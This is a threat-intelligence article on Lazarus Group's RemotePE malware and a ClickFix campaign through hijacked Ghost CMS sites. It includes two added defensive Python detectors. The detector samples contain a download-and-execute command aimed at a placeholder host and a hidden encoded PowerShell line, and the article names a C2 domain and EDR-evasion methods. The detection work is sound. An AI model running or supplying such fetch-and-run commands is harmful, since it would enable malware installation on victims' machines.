The North Korea-linked Lazarus Group has deployed a sophisticated fileless remote access trojan (RAT) known as RemotePE to infiltrate banks and cryptocurrency companies. First discovered in September 2025, the malware operates entirely within a system’s memory and leaves no artifact on disk, making it nearly impossible to detect with disk-based forensic methods. The Lazarus Group has already stolen $577 million in cryptocurrency during the first four months of 2026, a sum that accounts for 76% of all global crypto thefts this year.
The cybercrime organization utilizes complex social engineering to gain an initial foothold. Operators pose as employees of trading firms on Telegram and use counterfeit versions of popular scheduling platforms like Calendly and Picktime. This “human in the loop” methodology allows the group to build rapport with targets before initiating a three-stage infection chain designed to minimize disk footprint and evade security software.
Analysts at Fox-IT, an affiliate of NCC Group, noted that RemotePE is designed for long-term reconnaissance. Unlike typical disruptive attacks, the trojan is built to sustain itself in a network silently, allowing the state-sponsored actors to gather intelligence before striking. This development highlights the escalating threat to institutional security as bitcoin exchange supply maintains multi-year lows and investors increasingly rely on high-liquidity digital platforms.
Stealth techniques and the RemotePE infection chain
The malware’s architecture employs a coordinated sequence to bypass Endpoint Detection and Response (EDR) solutions. It begins with DPAPILoader, a dynamic-link library (DLL) that has also appeared under the filename Iassvc.dll since November 2023. This loader uses the Windows Data Protection Application Programming Interface (DPAPI) to decrypt an encrypted payload stored on disk. Because DPAPI keys are bound to the victim’s user or machine account, the blob can only be decrypted on the host it was created on, so it is unreadable to simple scans and to offline analysis of a copied file.
The decrypted payload is handed to RemotePELoader, which opens an HTTP connection to a command-and-control server at aes-secure[.]net. To remain invisible, the loader uses “Hell’s Gate” techniques, which resolve system call numbers directly from ntdll and invoke them without passing through the user-mode API functions that EDR products hook, and patches ETW (Event Tracing for Windows) so that the process stops emitting the telemetry security monitoring depends on. The final RemotePE payload runs in memory and never touches the filesystem, sidestepping tools that monitor for unauthorized file modifications.
The persistent nature of these attacks was recently documented at a decentralized finance (DeFi) firm. Investigators found the infrastructure was compromised by three different RATs: RemotePE, PondRAT, and ThemeForestRAT. The attackers swapped these tools in for one another, ensuring they maintained access even if one specific strain was identified and removed.
North Korean dominance in global cybercrime grows
Data from blockchain analytics firm TRM Labs shows a stark increase in North Korea’s share of global crypto crime. In 2025, the country was responsible for 64% of stolen funds, a figure that has climbed to 76% so far this year despite just two major hacking incidents. This shift toward high-value, sophisticated operations has brought the group’s total haul to $6 billion stolen since 2017.
International authorities allege these funds are used to finance the country’s nuclear and weapons development programs in defiance of sanctions. The group’s ability to extract such significant value through a small number of attacks suggests a highly disciplined approach to choosing targets. As THORChain warns users about widespread fraud, the professionalization of groups like Lazarus remains the primary concern for industry cybersecurity experts.
The economic impact of these thefts is compounded by the volatility of the current market. As crypto liquidations rise alongside broader macro pressures, the loss of $577 million in just four months places immense strain on DeFi ecosystems and banking protocols that are already navigating a sensitive regulatory environment.
Exploiting web infrastructure via Ghost CMS flaws
The Lazarus Group’s activity extends beyond direct social engineering into broader infrastructure exploitation. Cybersecurity experts recently identified a campaign targeting over 700 sites running the Ghost Content Management System (CMS). By leveraging a critical SQL injection flaw, the attackers gained access to administrator accounts for AI companies, news agencies, and fintech firms.
Hackers used these admin accounts to inject malicious JavaScript that turned the compromised sites into “ClickFix” distribution channels, redirecting visitors to fake CAPTCHA pages. Victims were prompted to paste a command into the Windows Run dialog, which launched a batch script on their machine. This script eventually installed an open-source version of an Electron application called Grape, which maintains persistent contact with its controllers.
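A ClickFix lure leaves a distinctive process lineage: a command shell or script host started directly by explorer.exe (the Run dialog’s parent) with a command line that fetches remote content or hides its window. The following detector is an added example, not code from the article or from any vendor; it runs over constructed Sysmon-style process-creation records with the field names ParentImage, Image and CommandLine, and the domain in the sample is a placeholder.

```python
"""Flag Run-dialog ("ClickFix") launches in process-creation telemetry.

Added example, not from the original article. Input is a list of
constructed Sysmon-style Event ID 1 records (dicts); only the fields
ParentImage, Image and CommandLine are used.
"""
import re
from typing import Iterable

# Script hosts and download utilities commonly seen as the pasted one-liner.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
          "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# Hidden-window, encoded-command and download-and-execute idioms.
SUSPICIOUS_FLAGS = re.compile(r"(?i)(-enc|-w(indowstyle)?\s+hidden|iex|"
                              r"invoke-expression|downloadstring|urlcache|-o\s|\|\s*cmd)")

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev: dict) -> int:
    """0 for events outside the pattern; higher the more ClickFix-like."""
    if basename(ev.get("ParentImage", "")) != "explorer.exe":
        return 0  # Run dialog launches are children of explorer.exe
    if basename(ev.get("Image", "")) not in SHELLS:
        return 0
    cmd = ev.get("CommandLine", "")
    score = 1  # interactive shell from explorer: low-signal on its own
    if URL_RE.search(cmd):
        score += 2  # remote content pulled straight from the Run box
    if SUSPICIOUS_FLAGS.search(cmd):
        score += 2
    return score

def find_clickfix(events: Iterable[dict], threshold: int = 3) -> list[dict]:
    return [dict(ev, score=s) for ev in events if (s := score_event(ev)) >= threshold]

# Constructed sample telemetry (not real logs); captcha-check.example is a placeholder.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c curl -s http://captcha-check.example/v.bat -o %TEMP%\v.bat && %TEMP%\v.bat"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc <BASE64_PLACEHOLDER>"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},  # a user simply opening a prompt
    {"ParentImage": r"C:\Program Files\Git\git-bash.exe", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl https://example.org/file"},  # not from explorer.exe
]

if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_EVENTS):
        print(hit["score"], hit["CommandLine"])
```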
Once installed, the Grape malware polls the command-and-control domain every 30 seconds to receive instructions. This multi-layered strategy demonstrates that the Lazarus Group is moving toward a more diversified attack surface. By targeting web management systems, they can gain entry into corporate networks that may not be directly related to their primary financial targets, creating a wider net for future heists.
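A fixed 30-second polling interval is exactly the kind of regularity a network defender can hunt for in proxy or flow logs. The following beacon detector is an added example, not from the article or any vendor: it groups constructed proxy-style log lines (timestamp, source, destination) by flow and flags those whose inter-connection gaps show very little jitter. The host and domains in the sample are placeholders.

```python
"""Flag fixed-interval beaconing in outbound connection logs.

Added example, not from the original article. Works on constructed
proxy-style lines "timestamp src dst"; a near-constant gap between
connections to one destination is treated as a beacon candidate.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev

# Constructed sample: one flow polls a placeholder domain every ~30 s with a
# second or so of jitter, another is ordinary irregular browsing.
SAMPLE_LOG = """\
2026-04-02T10:00:00Z 10.1.2.3 c2-placeholder.example
2026-04-02T10:00:30Z 10.1.2.3 c2-placeholder.example
2026-04-02T10:01:00Z 10.1.2.3 c2-placeholder.example
2026-04-02T10:01:31Z 10.1.2.3 c2-placeholder.example
2026-04-02T10:02:00Z 10.1.2.3 c2-placeholder.example
2026-04-02T10:02:30Z 10.1.2.3 c2-placeholder.example
2026-04-02T10:00:05Z 10.1.2.3 news.example.org
2026-04-02T10:00:47Z 10.1.2.3 news.example.org
2026-04-02T10:03:12Z 10.1.2.3 news.example.org
2026-04-02T10:09:40Z 10.1.2.3 news.example.org
2026-04-02T10:09:41Z 10.1.2.3 news.example.org
2026-04-02T10:15:00Z 10.1.2.3 news.example.org
"""

def parse(log: str) -> dict[tuple[str, str], list[datetime]]:
    """Group connection timestamps by (source, destination)."""
    flows = defaultdict(list)
    for line in log.splitlines():
        ts, src, dst = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts.replace("Z", "+00:00")))
    return flows

def beacon_stats(times: list[datetime]) -> tuple[float, float]:
    """Median gap in seconds and relative jitter (population stdev / median)."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    med = median(gaps)
    return med, (pstdev(gaps) / med if med else float("inf"))

def find_beacons(log: str, min_events: int = 5, max_jitter: float = 0.1) -> list[tuple[str, str, float]]:
    """Return (src, dst, median_gap_seconds) for flows that poll at a fixed interval."""
    hits = []
    for (src, dst), times in parse(log).items():
        if len(times) < min_events:
            continue  # too few samples to judge periodicity
        med, jitter = beacon_stats(times)
        if jitter <= max_jitter:
            hits.append((src, dst, med))
    return hits

if __name__ == "__main__":
    for src, dst, gap in find_beacons(SAMPLE_LOG):
        print(f"{src} -> {dst}: every {gap:.0f}s")
```

Real implants often add randomized sleep, so in production the jitter threshold is tuned per environment rather than fixed at 10%.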
